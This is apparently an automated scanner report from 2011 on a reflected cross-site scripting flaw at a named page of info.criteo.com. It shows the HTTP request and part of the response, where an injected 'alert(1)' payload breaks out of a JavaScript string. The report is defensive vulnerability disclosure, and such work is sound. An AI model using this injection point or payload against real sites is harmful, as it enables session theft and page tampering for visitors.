1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://info.criteo.com |
Path: | /pmo/privacy/informations |
GET /pmo/privacy/informations Host: info.criteo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Vary: Accept-Encoding Cache-Control: private Content-Type: text/html; charset=utf-8 P3P: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA" Date: Sun, 04 Dec 2011 15:04:58 GMT Connection: close Set-Cookie: uid=dece7021-7afd-4fea Set-Cookie: X-Mapping-hmeipdnj Content-Length: 12490 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.lpv = "1"; flashvars.bf176;alert(1)/ flashvars.swif_lcta = "Learn more"; flashvars.aff = "criteo"; flashvars.ref = "criteo"; flashvars.ctoFlashWi flashvars.lurl = "http ...[SNIP]... |